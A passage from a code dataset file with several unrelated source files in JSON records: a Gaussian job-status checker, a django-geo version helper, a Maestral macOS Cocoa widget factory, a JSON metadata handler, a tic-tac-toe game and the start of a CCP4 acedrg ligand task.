os.path.isfile(molsfile):\n if os.path.isfile(s0logfile):\n process = os.popen(\"grep 'Error termination' \"+s0logfile)\n s0errorinfo = process.read()\n process.close()\n if os.path.isfile(s1logfile):\n process = os.popen(\"grep 'Error termination' \"+s1logfile)\n s1errorinfo = process.read()\n process.close()\n if os.path.isfile(t1logfile):\n process = os.popen(\"grep 'Error termination' \"+t1logfile)\n t1errorinfo = process.read() \n process.close()\n \n if s0errorinfo or s1errorinfo or t1errorinfo:\n #n = n+1\n if os.path.exists(mol_dir):\n shutil.move(mol_dir,self.gdb_error)\n return True\n elif not s0errorinfo and not s1errorinfo and not t1errorinfo:\n if not os.path.isfile(s0logfile) or not os.path.isfile(s1logfile) or not os.path.isfile(t1logfile):\n shutil.move(mol_dir,self.gdb_error)\n return True\n return False\n\n def job_is_done(self):\n '''\n the function checks if all the calculations are done\n done: return true\n otherwise return false\n '''\n a = os.popen('qstat | grep '+self.user+' | wc -l')\n jobnumber = int(a.read())\n if jobnumber==1:\n if not all_mol_dir():\n return True\n\n def calculation_is_checked(self,mol_dir):\n '''\n the function checks if the calculation of a molecular is done\n if the job is done, return true\n otherwise return false\n '''\n\n s0logfile = self.gdb+'/'+mol_dir+'/'+'s0'+'/'+mol_dir+'_s0.log'\n s1logfile = self.gdb+'/'+mol_dir+'/'+'s1'+'/'+mol_dir+'_s1.log'\n t1logfile = self.gdb+'/'+mol_dir+'/'+'t1'+'/'+mol_dir+'_t1.log'\n s0info = ''\n s1info = ''\n t1info = ''\n\n if os.path.isfile(s0logfile):\n process = os.popen(\"grep 'termination' \"+s0logfile)\n s0info = process.read()\n process.close()\n if os.path.isfile(s1logfile):\n process = os.popen(\"grep 'termination' \"+s1logfile)\n s1info = process.read()\n process.close()\n if os.path.isfile(t1logfile):\n process = os.popen(\"grep 'termination' \"+t1logfile)\n t1info = process.read() \n process.close()\n if s0info and s1info and t1info:\n return True\n return False\n\n def mv2gdb_done(self,mol_dir):\n '''\n the function move the molecular dir to the gdb_done dir\n '''\n molecular_dir = self.gdb + '/' + mol_dir\n shutil.move(molecular_dir,self.gdb_done)\n\n def my_sleep(self):\n '''\n the process would sleep 300s\n once the function is called\n '''\n sleep(300)\n\n\n\n\n","sub_path":"gaussianjobcontrol.py","file_name":"gaussianjobcontrol.py","file_ext":"py","file_size_in_byte":28727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"482848774","text":"NAME = 'django-geo'\nVERSION = __version__ = (0, 2, 1, 'beta', 1)\n__author__ = 'sax'\n\ndef get_version(version=None, short=False):\n \"\"\"Derives a PEP386-compliant version number from VERSION.\"\"\"\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in ('alpha', 'beta', 'rc', 'final')\n\n # Now build the two parts of the version number:\n # main = X.Y[.Z]\n # sub = .devN - for pre-alpha releases\n # | {a|b|c}N - for alpha, beta and rc releases\n\n parts = 2 if version[2] == 0 else 3\n main = '.'.join(str(x) for x in version[:parts])\n\n sub = ''\n if version[3] == 'alpha' and version[4] == 0:\n sub = '.dev'\n if not short:\n import geo\n path = geo.__path__[0]\n head_path = '%s/../.git/logs/HEAD' % path\n try:\n for line in open(head_path):pass\n revision = line.split()[0]\n except IOError:\n raise Exception('Aplha version is are only allowed as git clone')\n sub += revision\n\n elif version[3] != 'final':\n mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub\n","sub_path":"geo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"354909122","text":"# -*- coding: utf-8 -*-\n\n# system imports\nimport os.path as osp\nimport platform\n\n# external imports\nfrom travertino.size import at_least\nfrom rubicon.objc import (\n NSMakeSize,\n NSZeroPoint,\n CGRectMake,\n ObjCClass,\n objc_method,\n SEL,\n at,\n)\nfrom toga.constants import LEFT, TRANSPARENT\nfrom toga_cocoa.libs import (\n NSColor,\n NSString,\n NSTextView,\n NSTextAlignment,\n NSRecessedBezelStyle,\n NSViewMaxYMargin,\n NSMenuItem,\n NSMenu,\n NSApplication,\n NSObject,\n NSApplicationActivationPolicyAccessory,\n NSApplicationActivationPolicyRegular,\n NSImage,\n NSImageInterpolationHigh,\n NSGraphicsContext,\n NSRect,\n NSPoint,\n NSBezierPath,\n NSTextField,\n NSPopUpButton,\n NSOpenPanel,\n NSFileHandlingPanelOKButton,\n NSCompositingOperationCopy,\n NSURL,\n NSButton,\n NSRoundedBezelStyle,\n NSSwitchButton,\n)\nfrom toga_cocoa.colors import native_color\nfrom toga_cocoa.keys import cocoa_key\nfrom toga_cocoa.app import App as TogaApp\nfrom toga_cocoa.widgets.base import Widget\nfrom toga_cocoa.widgets.button import Button as TogaButton\nfrom toga_cocoa.window import Window as TogaWindow\nfrom toga_cocoa.window import WindowDelegate as TogaWindowDeletage\nfrom toga_cocoa.widgets.multilinetextinput import (\n MultilineTextInput as TogaMultilineTextInput,\n)\nfrom toga_cocoa.factory import ImageView\nfrom toga_cocoa.factory import * # noqa: F401,F406\n\n# local imports\nfrom . import dialogs\nfrom .constants import (\n NSButtonTypeMomentaryPushIn,\n NSFocusRingTypeNone,\n NSControlState,\n NSSquareStatusItemLength,\n NSWindowAnimationBehaviorDefault,\n NSWindowAnimationBehaviorAlertPanel,\n NSUTF8StringEncoding,\n NSImageLeading,\n NSCompositeSourceOver,\n NSImageNameFollowLinkFreestandingTemplate,\n NSImageNameInvalidDataFreestandingTemplate,\n NSImageNameRefreshFreestandingTemplate,\n NSImageNameRevealFreestandingTemplate,\n NSImageNameStopProgressFreestandingTemplate,\n)\nfrom ...constants import (\n WORD_WRAP,\n CHARACTER_WRAP,\n CLIP,\n TRUNCATE_HEAD,\n TRUNCATE_MIDDLE,\n TRUNCATE_TAIL,\n ON,\n OFF,\n MIXED,\n ImageTemplate,\n)\n\n\nNSWorkspace = ObjCClass(\"NSWorkspace\")\nNSVisualEffectView = ObjCClass(\"NSVisualEffectView\")\nNSMutableAttributedString = ObjCClass(\"NSMutableAttributedString\")\nNSStatusBar = ObjCClass(\"NSStatusBar\")\nNSColorSpace = ObjCClass(\"NSColorSpace\")\n\nNSNormalWindowLevel = 0\nNSModalPanelWindowLevel = 8\n\n\nmacos_version, *_ = platform.mac_ver()\n\n\n# ==== icons ===========================================================================\n\n\nclass Icon:\n \"\"\"Reimplements toga.Icon but provides the icon for the file / folder type\n instead of loading an icon from the file content.\"\"\"\n\n _to_cocoa_template = {\n None: None,\n ImageTemplate.Refresh: NSImageNameRefreshFreestandingTemplate,\n ImageTemplate.FollowLink: NSImageNameFollowLinkFreestandingTemplate,\n ImageTemplate.Reveal: NSImageNameRevealFreestandingTemplate,\n ImageTemplate.InvalidData: NSImageNameInvalidDataFreestandingTemplate,\n ImageTemplate.StopProgress: NSImageNameStopProgressFreestandingTemplate,\n }\n\n def __init__(self, interface, path=None, for_path=None, template=None):\n self.interface = interface\n self.interface._impl = self\n self.path = str(path) if path else None\n self.for_path = for_path\n self.template = template\n\n self._native = None\n\n @property\n def native(self):\n\n if self._native:\n return self._native\n\n if self.path:\n self._native = NSImage.alloc().initWithContentsOfFile(self.path)\n return self._native\n\n elif self.for_path:\n # always return a new pointer since an old one may be invalidated\n # icons are cached by AppKit anyways\n path = str(self.for_path)\n if osp.exists(path):\n return NSWorkspace.sharedWorkspace.iconForFile(path)\n else:\n _, extension = osp.splitext(path)\n return NSWorkspace.sharedWorkspace.iconForFileType(extension)\n\n elif self.template:\n cocoa_template = Icon._to_cocoa_template[self.template]\n self._native = NSImage.imageNamed(cocoa_template)\n return self._native\n\n\n# ==== labels ==========================================================================\n\n\ndef attributed_str_from_html(raw_html, font=None, color=None):\n \"\"\"Converts html to a NSAttributed string using the system font family and color.\"\"\"\n\n html_value = \"\"\"\n <span style=\"font-family: '{0}'; font-size: {1}; color: {2}\">\n {3}\n </span>\n \"\"\"\n font_family = font.fontName if font else \"system-ui\"\n font_size = font.pointSize if font else 13\n color = color or NSColor.labelColor\n c = color.colorUsingColorSpace(NSColorSpace.deviceRGBColorSpace)\n c_str = (\n f\"rgb({c.redComponent * 255},{c.blueComponent * 255},{c.greenComponent * 255})\"\n )\n html_value = html_value.format(font_family, font_size, c_str, raw_html)\n nsstring = NSString(at(html_value))\n data = nsstring.dataUsingEncoding(NSUTF8StringEncoding)\n attr_str = NSMutableAttributedString.alloc().initWithHTML(\n data,\n documentAttributes=None,\n )\n return attr_str\n\n\nclass Label(Widget):\n \"\"\"Reimplements toga_cocoa.Label with text wrapping.\"\"\"\n\n _toga_to_cocoa_linebreakmode = {\n WORD_WRAP: 0,\n CHARACTER_WRAP: 1,\n CLIP: 2,\n TRUNCATE_HEAD: 3,\n TRUNCATE_TAIL: 4,\n TRUNCATE_MIDDLE: 5,\n }\n\n def create(self):\n self.native = NSTextField.labelWithString(\"\")\n self.native.impl = self\n self.native.interface = self.interface\n\n # Add the layout constraints\n self.add_constraints()\n\n def set_alignment(self, value):\n self.native.alignment = NSTextAlignment(value)\n\n def set_color(self, value):\n if value:\n self.native.textColor = native_color(value)\n\n def set_font(self, font):\n if font:\n self.native.font = font.bind(self.interface.factory).native\n\n def set_text(self, value):\n self.native.stringValue = value\n\n def set_linebreak_mode(self, value):\n self.native.cell.lineBreakMode = Label._toga_to_cocoa_linebreakmode[value]\n\n def set_background_color(self, color):\n if color in (None, TRANSPARENT):\n self.native.backgroundColor = NSColor.clearColor\n self.native.drawsBackground = False\n else:\n self.native.backgroundColor = native_color(color)\n self.native.drawsBackground = True\n\n def rehint(self):\n\n if self.interface.style.width:\n self.native.preferredMaxLayoutWidth = self.interface.style.width\n\n content_size = self.native.intrinsicContentSize()\n\n if self.interface.style.width:\n self.interface.intrinsic.width = at_least(content_size.width)\n self.interface.intrinsic.height = at_least(content_size.height)\n else:\n self.interface.intrinsic.width = at_least(0)\n self.interface.intrinsic.height = at_least(content_size.height)\n\n\nclass RichLabel(Widget):\n \"\"\"A multiline text view with html support.\"\"\"\n\n def create(self):\n self._color = None\n self.native = NSTextView.alloc().init()\n self.native.impl = self\n self.native.interface = self.interface\n\n self.native.drawsBackground = False\n self.native.editable = False\n self.native.selectable = True\n self.native.textContainer.lineFragmentPadding = 0\n\n self.native.bezeled = False\n\n # Add the layout constraints\n self.add_constraints()\n\n def set_html(self, value):\n attr_str = attributed_str_from_html(value, color=self._color)\n self.native.textStorage.setAttributedString(attr_str)\n self.rehint()\n\n def set_font(self, font):\n native_font = font.bind(self.interface.factory).native\n attr_str = attributed_str_from_html(\n self.interface.html, color=self._color, font=native_font\n )\n self.native.textStorage.setAttributedString(attr_str)\n self.rehint()\n\n def set_color(self, value):\n if value:\n self._color = native_color(value)\n\n # update html\n self.set_html(self.interface.html)\n\n def rehint(self):\n # force layout and get layout rect\n self.native.layoutManager.glyphRangeForTextContainer(self.native.textContainer)\n rect = self.native.layoutManager.usedRectForTextContainer(\n self.native.textContainer\n )\n\n self.interface.intrinsic.width = at_least(rect.size.width)\n self.interface.intrinsic.height = rect.size.height\n\n\n# ==== text input ======================================================================\n\n\nclass RichMultilineTextInput(TogaMultilineTextInput):\n \"\"\"A scrollable text view with html support.\"\"\"\n\n def set_html(self, value):\n attr_str = attributed_str_from_html(value, font=self.text.font)\n self.text.textStorage.setAttributedString(attr_str)\n\n\n# ==== buttons =========================================================================\n\n\nclass FreestandingIconButton(TogaButton):\n \"\"\"A styled button with an icon.\"\"\"\n\n def create(self):\n super().create()\n self.native.showsBorderOnlyWhileMouseInside = True\n self.native.bordered = False\n self.native.buttonType = NSButtonTypeMomentaryPushIn\n self.native.bezelStyle = NSRecessedBezelStyle\n self.native.imagePosition = NSImageLeading\n self.native.alignment = NSTextAlignment(LEFT)\n self.native.focusRingType = NSFocusRingTypeNone\n\n def set_label(self, label):\n self.native.title = \" {}\".format(self.interface.label)\n\n def set_icon(self, icon_iface):\n icon = icon_iface.bind(self.interface.factory)\n if self.interface.style.height > 0:\n icon_size = self.interface.style.height\n else:\n icon_size = 16\n self.native.image = resize_image_to(icon.native, icon_size)\n self.native.image.template = True\n\n\nclass SwitchTarget(NSObject):\n @objc_method\n def onPress_(self, obj) -> None:\n if self.interface.on_toggle:\n self.interface.on_toggle(self.interface)\n\n self.impl.native.allowsMixedState = False\n\n\nclass Switch(Widget):\n \"\"\"Similar to toga_cocoa.Switch but allows *programmatic* setting of\n an intermediate state.\"\"\"\n\n _to_cocoa = {OFF: 0, MIXED: -1, ON: 1}\n _to_toga = {0: OFF, -1: MIXED, 1: ON}\n\n def create(self):\n self.native = NSButton.alloc().init()\n self.native.bezelStyle = NSRoundedBezelStyle\n self.native.setButtonType(NSSwitchButton)\n self.native.autoresizingMask = NSViewMaxYMargin | NSViewMaxYMargin\n\n self.target = SwitchTarget.alloc().init()\n self.target.interface = self.interface\n self.target.impl = self\n\n self.native.target = self.target\n self.native.action = SEL(\"onPress:\")\n\n # Add the layout constraints\n self.add_constraints()\n\n def set_label(self, label):\n self.native.title = self.interface.label\n\n def set_state(self, value):\n self.native.allowsMixedState = value == MIXED\n self.native.state = self._to_cocoa[value]\n\n def set_is_on(self, value):\n self.set_state(int(value))\n\n def get_is_on(self):\n return bool(self.native.state)\n\n def get_state(self):\n return self._to_toga[self.native.state]\n\n def set_font(self, font):\n if font:\n self.native.font = font.bind(self.interface.factory).native\n\n def rehint(self):\n content_size = self.native.intrinsicContentSize()\n self.interface.intrinsic.height = 20\n self.interface.intrinsic.width = at_least(content_size.width)\n\n def set_on_toggle(self, handler):\n pass\n\n\nclass FileChooserTarget(NSObject):\n @objc_method\n def onSelect_(self, obj) -> None:\n if self.impl.native.indexOfSelectedItem == 2:\n\n self.impl.native.selectItemAtIndex(0)\n\n panel = NSOpenPanel.alloc().init()\n panel.title = self.interface.dialog_title\n panel.message = self.interface.dialog_message\n panel.canChooseFiles = self.interface.select_files\n panel.canChooseDirectories = self.interface.select_folders\n panel.canCreateDirectories = True\n panel.resolvesAliases = True\n panel.allowsMultipleSelection = False\n panel.directoryURL = NSURL.fileURLWithPath(\n osp.dirname(self.interface.current_selection)\n )\n panel.prompt = \"Select\"\n\n def completion_handler(r: int) -> None:\n\n if r == NSFileHandlingPanelOKButton:\n self.impl.set_current_selection(str(panel.URL.path))\n\n if self.interface.on_select:\n self.interface.on_select(self.interface)\n\n panel.beginSheetModalForWindow(\n self.interface.window._impl.native, completionHandler=completion_handler\n )\n\n\nclass FileSelectionButton(Widget):\n def create(self):\n self.native = NSPopUpButton.alloc().init()\n self.target = FileChooserTarget.alloc().init()\n self.target.interface = self.interface\n self.target.impl = self\n self.native.target = self.target\n self.native.action = SEL(\"onSelect:\")\n\n self._current_selection = \"\"\n self.native.addItemWithTitle(\"\")\n self.native.menu.addItem(NSMenuItem.separatorItem())\n self.native.addItemWithTitle(\"Choose...\")\n\n self.add_constraints()\n\n def get_current_selection(self):\n return self._current_selection\n\n def set_current_selection(self, path):\n\n if not osp.exists(path) and not self.interface.select_files:\n # use generic folder icon\n image = NSWorkspace.sharedWorkspace.iconForFile(\"/usr\")\n else:\n # use actual icon for file / folder, falls back to generic file icon\n image = NSWorkspace.sharedWorkspace.iconForFile(path)\n\n item = self.native.itemAtIndex(0)\n item.title = path if self.interface.show_full_path else osp.basename(path)\n item.image = resize_image_to(image, 16)\n self._current_selection = path\n\n def set_on_select(self, handler):\n pass\n\n def set_select_files(self, value):\n pass\n\n def set_select_folders(self, value):\n pass\n\n def set_dialog_title(self, value):\n pass\n\n def set_show_full_path(self, value):\n item = self.native.itemAtIndex(0)\n path = self.interface.current_selection\n item.title = path if value else osp.basename(path)\n\n def set_dialog_message(self, value):\n pass\n\n def rehint(self):\n content_size = self.native.intrinsicContentSize()\n self.interface.intrinsic.height = content_size.height + 1\n self.interface.intrinsic.width = at_least(\n max(self.interface.MIN_WIDTH, content_size.width)\n )\n\n\n# ==== menus and status bar ============================================================\n\n\nclass TogaMenuItem(NSMenuItem):\n @objc_method\n def onPress_(self, obj) -> None:\n if self.interface.action:\n self.interface.action(self.interface)\n\n\nclass MenuItem:\n def __init__(self, interface):\n self.interface = interface\n self.native = TogaMenuItem.alloc().init()\n self.native.interface = self.interface\n self.native.impl = self\n self.native.target = self.native\n self.native.action = SEL(\"onPress:\")\n\n def set_enabled(self, enabled):\n self.native.enabled = enabled\n\n def set_icon(self, icon):\n if icon:\n icon = icon.bind(self.interface.factory)\n nsimage = resize_image_to(icon.native, 16)\n self.native.image = nsimage\n else:\n self.native.image = None\n\n def set_label(self, label):\n self.native.title = label\n\n def set_submenu(self, menu_impl):\n if menu_impl:\n self.native.submenu = menu_impl.native\n self.native.enabled = True\n else:\n self.native.submenu = None\n\n def set_action(self, action):\n pass\n\n def set_checked(self, yes):\n self.native.state = NSControlState(yes)\n\n def set_shortcut(self, shortcut):\n if shortcut:\n key, modifier = cocoa_key(shortcut)\n\n self.native.keyEquivalent = key\n if modifier:\n self.native.keyEquivalentModifierMask = modifier\n\n\nclass MenuItemSeparator:\n def __init__(self, interface):\n self.interface = interface\n self.native = NSMenuItem.separatorItem()\n self.native.retain()\n\n\nclass TogaMenu(NSMenu):\n @objc_method\n def menuWillOpen_(self, obj) -> None:\n self.impl._visible = True\n if self.interface.on_open:\n self.interface.on_open(self.interface)\n\n @objc_method\n def menuDidClose_(self, obj) -> None:\n self.impl._visible = False\n if self.interface.on_close:\n self.interface.on_close(self.interface)\n\n\nclass Menu:\n def __init__(self, interface):\n self.interface = interface\n self._visible = False\n\n self.native = TogaMenu.alloc().init()\n self.native.autoenablesItems = False\n\n self.native.impl = self\n self.native.interface = self.interface\n self.native.delegate = self.native\n\n def add_item(self, item_impl):\n self.native.addItem(item_impl.native)\n\n def insert_item(self, index, item_impl):\n self.native.insertItem(item_impl.native, atIndex=index)\n\n def remove_item(self, item_impl):\n self.native.removeItem(item_impl.native)\n\n @property\n def visible(self):\n return self._visible\n\n\n# ==== StatusBarItem ===================================================================\n\n\nclass StatusBarItem:\n MARGIN = 2\n\n def __init__(self, interface):\n self.interface = interface\n self.native = NSStatusBar.systemStatusBar.statusItemWithLength(\n NSSquareStatusItemLength\n )\n self.size = NSStatusBar.systemStatusBar.thickness\n\n def set_icon(self, icon):\n icon = icon.bind(self.interface.factory)\n nsimage = resize_image_to(icon.native, self.size - 2 * self.MARGIN)\n nsimage.template = True\n self.native.button.image = nsimage\n\n def set_menu(self, menu_impl):\n self.native.menu = menu_impl.native\n\n\n# ==== Application =====================================================================\n\n\nclass SystemTrayAppDelegate(NSObject):\n @objc_method\n def applicationWillTerminate_(self, sender):\n if self.interface.app.on_exit:\n self.interface.app.on_exit(self.interface.app)\n\n @objc_method\n def selectMenuItem_(self, sender) -> None:\n cmd = self.impl._menu_items[sender]\n if cmd.action:\n cmd.action(None)\n\n\nclass SystemTrayApp(TogaApp):\n\n _MAIN_WINDOW_CLASS = None\n\n def _create_app_commands(self):\n # Hack: we use _create_app_commands here to inject our own modifications\n # into the superclass create command *before* the actual GUI is loaded.\n\n self.delegate = SystemTrayAppDelegate.alloc().init()\n self.delegate.impl = self\n self.delegate.interface = self.interface\n self.delegate.native = self.native\n self.native.delegate = self.delegate\n\n def select_file(self):\n pass\n\n def open_document(self, path):\n pass\n\n def has_open_windows(self):\n\n visible_windows = [\n w\n for w in self.native.windows\n if w.isVisible and w.objc_class.name != \"NSStatusBarWindow\"\n ]\n\n return len(visible_windows) > 1\n\n def show_dock_icon(self):\n self.native.activationPolicy = NSApplicationActivationPolicyRegular\n\n def hide_dock_icon(self):\n self.native.activationPolicy = NSApplicationActivationPolicyAccessory\n\n async def alert_async(\n self,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n ):\n\n return await dialogs.alert_async(\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n )\n\n def alert(\n self,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n ):\n\n return dialogs.alert(\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n )\n\n\nclass WindowDeletage(TogaWindowDeletage):\n @objc_method\n def windowWillClose_(self, notification) -> None:\n\n if not self.interface.is_dialog:\n if not self.interface.app._impl.has_open_windows():\n self.interface.app._impl.hide_dock_icon()\n\n\nclass Window(TogaWindow):\n def create(self):\n super().create()\n self.delegate = WindowDeletage.alloc().init()\n self.delegate.interface = self.interface\n self.delegate.impl = self\n self.native.delegate = self.delegate\n self.app = NSApplication.sharedApplication\n\n def cocoa_windowShouldClose(self):\n if self.interface.on_close:\n should_close = self.interface.on_close(self)\n else:\n should_close = True\n\n return should_close\n\n def is_visible(self):\n return bool(self.native.isVisible)\n\n def center(self):\n self.native.center()\n\n def force_to_front(self):\n self.native.makeKeyAndOrderFront(None)\n\n def show_as_sheet(self, window):\n window._impl.native.beginSheet(self.native, completionHandler=None)\n\n def show(self):\n if not self.interface.is_dialog:\n self.app.activationPolicy = NSApplicationActivationPolicyRegular\n self.app.activateIgnoringOtherApps(True)\n super().show()\n\n def close(self):\n\n if self.native.sheetParent:\n # End sheet session.\n self.native.sheetParent.endSheet(self.native)\n elif self.interface.closeable:\n # Mimic the press of the close button.\n self.native.performClose(self.native)\n else:\n # Window has no close button -> performClose does not work.\n # Get close confirmation and close if ok.\n if self.cocoa_windowShouldClose():\n self.native.close()\n\n def set_release_on_close(self, value):\n self.native.releasedWhenClosed = value\n\n def set_dialog(self, value):\n\n if value:\n self.native.animationBehavior = NSWindowAnimationBehaviorAlertPanel\n self.native.level = NSModalPanelWindowLevel\n else:\n self.native.animationBehavior = NSWindowAnimationBehaviorDefault\n self.native.level = NSNormalWindowLevel\n\n # dialogs\n\n async def save_file_sheet(self, title, message, suggested_filename, file_types):\n return await dialogs.save_file_sheet(\n self.interface, suggested_filename, title, message, file_types\n )\n\n async def open_file_sheet(\n self, title, message, initial_directory, file_types, multiselect\n ):\n return await dialogs.open_file_sheet(\n self.interface, title, message, file_types, multiselect\n )\n\n async def select_folder_sheet(self, title, message, initial_directory, multiselect):\n return await dialogs.select_folder_sheet(\n self.interface, title, message, multiselect\n )\n\n async def alert_sheet(\n self,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n ):\n return await dialogs.alert_sheet(\n self.interface,\n title,\n message,\n details,\n details_title,\n button_labels,\n checkbox_text,\n level,\n icon,\n )\n\n\n# ==== helpers =========================================================================\n\n\ndef apply_round_clipping(image_view_impl: ImageView) -> None:\n \"\"\"Clips an image in a given toga_cocoa.ImageView to a circular mask.\"\"\"\n\n image = image_view_impl.native.image # get native NSImage\n\n composed_image = NSImage.alloc().initWithSize(image.size)\n composed_image.lockFocus()\n\n ctx = NSGraphicsContext.currentContext\n ctx.saveGraphicsState()\n ctx.imageInterpolation = NSImageInterpolationHigh\n\n image_frame = NSRect(NSPoint(0, 0), image.size)\n clip_path = NSBezierPath.bezierPathWithRoundedRect(\n image_frame, xRadius=image.size.width / 2, yRadius=image.size.height / 2\n )\n clip_path.addClip()\n\n zero_rect = NSRect(NSPoint(0, 0), NSMakeSize(0, 0))\n image.drawInRect(\n image_frame, fromRect=zero_rect, operation=NSCompositeSourceOver, fraction=1\n )\n composed_image.unlockFocus()\n ctx.restoreGraphicsState()\n\n image_view_impl.native.image = composed_image\n\n\ndef resize_image_to(image: NSImage, height: int) -> NSImage:\n\n new_size = NSMakeSize(height, height)\n new_image = NSImage.alloc().initWithSize(new_size)\n new_image.lockFocus()\n image.size = new_size\n\n ctx = NSGraphicsContext.currentContext\n ctx.saveGraphicsState()\n ctx.imageInterpolation = NSImageInterpolationHigh\n\n image.drawAtPoint(\n NSZeroPoint,\n fromRect=CGRectMake(0, 0, new_size.width, new_size.height),\n operation=NSCompositingOperationCopy,\n fraction=1.0,\n )\n\n new_image.unlockFocus()\n ctx.restoreGraphicsState()\n\n return new_image\n","sub_path":"src/maestral_cocoa/private/implementation/cocoa/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":25936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273630313","text":"from cing.Libs.jsonTools.handlers import BaseHandler\nfrom cing.Libs.jsonTools import tags\n\n__author__ = 'geerten'\n\n### Separate files because of cyclic imports otherwise??\n#GWV\nclass Metadata(dict):\n \"\"\"\n just a container to be able to define a handler\n \"\"\"\n#end class\n\nclass MetadataJsonHandler(BaseHandler):\n \"\"\"\n Handler for the MetaData;\n on decode add a instances as attribute of context for\n subsequent usage\n \"\"\"\n def flatten(self, obj, data):\n flatten = self.context.flatten\n for k,v in obj.items():\n data[k] = flatten(v,reset=False)\n return data\n\n def restore(self, data):\n data.pop(tags.OBJECT)\n restore = self.context.restore\n mdata = Metadata()\n for k in data.keys():\n mdata[k] = restore(data[k])\n #end for\n # add to context\n setattr(self.context,'metadata', mdata)\n return mdata\n #end def\n#end class\nMetadataJsonHandler.handles(Metadata)\n\n","sub_path":"cing/python/cing/Libs/jsonTools/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"204554413","text":"print(\"Крест��ки-нолики\")\nfield = ['.', '.', '.',\n '.', '.', '.',\n '.', '.', '.']\n\ngame_continues = True\ncurrent_player = \"X\"\nwinner = None\n\ndef display_field():\n print(field[0] + \" \" + field[1] + \" \" + field[2])\n print(field[3] + \" \" + field[4] + \" \" + field[5])\n print(field[6] + \" \" + field[7] + \" \" + field[8])\n\ndef play_game():\n display_field()\n while game_continues:\n handle_turn(current_player)\n check_game_over()\n change_player()\n if winner == \"X\" or winner == \"O\":\n print(\"Победа \" + winner)\n elif winner == None:\n print(\"Ничья\")\n\ndef handle_turn(player):\n print(\"Ход \" + player)\n position = input(\"Введите значение от 1 до 9: \")\n valid = False\n while not valid:\n while position not in [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n position = input(\"Пожалуйста, введите значение от 1 до 9: \")\n position = int(position) - 1\n if field[position] == \".\":\n valid = True\n else:\n print(\"Такой ход нельзя совершить! Попробуйте еще раз!\")\n field[position] = player\n display_field()\n\ndef check_game_over():\n check_win()\n check_tie()\n\ndef check_win():\n global winner\n row_winner = check_rows()\n column_winner = check_columns()\n diagonal_winner = check_diagonals()\n if row_winner:\n winner = row_winner\n elif column_winner:\n winner = column_winner\n elif diagonal_winner:\n winner = diagonal_winner\n else:\n winner = None\n return\n\ndef check_rows():\n global game_continues\n row_1 = field[0] == field[1] == field[2] != \".\"\n row_2 = field[3] == field[4] == field[5] != \".\"\n row_3 = field[6] == field[7] == field[8] != \".\"\n if row_1 or row_2 or row_3:\n game_continues = False\n if row_1:\n return field[0]\n elif row_2:\n return field[3]\n elif row_3:\n return field[6]\n return\n\ndef check_columns():\n global game_continues\n column_1 = field[0] == field[3] == field[6] != \".\"\n column_2 = field[1] == field[4] == field[7] != \".\"\n column_3 = field[2] == field[5] == field[8] != \".\"\n if column_1 or column_2 or column_3:\n game_continues = False\n if column_1:\n return field[0]\n elif column_2:\n return field[1]\n elif column_3:\n return field[2]\n return\n\ndef check_diagonals():\n global game_continues\n diagonal_1 = field[0] == field[4] == field[8] != \".\"\n diagonal_2 = field[6] == field[4] == field[2] != \".\"\n if diagonal_1 or diagonal_2:\n game_continues = False\n if diagonal_1:\n return field[0]\n elif diagonal_2:\n return field[6]\n return\n\ndef check_tie():\n global game_continues\n if \".\" not in field:\n game_continues = False\n return\n\ndef change_player():\n global current_player\n if current_player == \"X\":\n current_player = \"O\"\n elif current_player == \"O\":\n current_player = \"X\"\n return\n\nplay_game()","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"217006015","text":"##!/usr/bin/python\n\n#\n# ============================================================================\n#\n# 06.11.17 <-- Date of Last Modification.\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ----------------------------------------------------------------------------\n#\n# ACEDRG EXECUTABLE MODULE\n#\n# Command-line:\n# ccp4-python -m pycofe.tasks.makeligand exeType jobDir jobId\n#\n# where:\n# exeType is either SHELL or SGE\n# jobDir is path to job directory, having:\n# jobDir/output : directory receiving output files with metadata of\n# all successful imports\n# jobDir/report : directory receiving HTML report\n#\n# Copyright (C) Eugene Krissinel, Andrey Lebedev 2017\n#\n# ============================================================================\n#\n\n# python native imports\nimport os\n\n# application imports\nimport basic\n\n\n# ============================================================================\n# Make Refmac driver\n\nclass MakeLigand(basic.TaskDriver):\n\n def smiles_file_path(self): return \"smiles.smi\"\n\n # ------------------------------------------------------------------------\n\n def run(self):\n\n # Prepare makeligand input\n # fetch input data\n\n sourceKey = self.getParameter ( self.task.parameters.SOURCE_SEL )\n\n if sourceKey == \"S\":\n smiles = self.getParameter ( self.task.parameters.SMILES )\n code = self.getParameter ( self.task.parameters.CODE ).upper()\n\n f = open ( self.smiles_file_path(),'w' )\n f.write ( smiles + '\\n' )\n f.close ()\n\n # make command-line parameters\n cmd = [ \"-i\",self.smiles_file_path(),\n \"-r\",code,\"-o\",code ]\n\n else:\n code = self.getParameter ( self.task.parameters.CODE3 ).upper()\n cmd = [ \"-c\",os.path.join(os.environ[\"CCP4\"],\"lib\",\"data\",\"monomers\",\n code[0].lower(),code + \".cif\" ),\n \"-r\",code,\"-o\",code ]\n\n if self.outputFName == \"\":\n self.outputFName = code.upper()\n\n # Start makeligand\n self.runApp ( \"acedrg\",cmd )\n\n xyzPath = code + 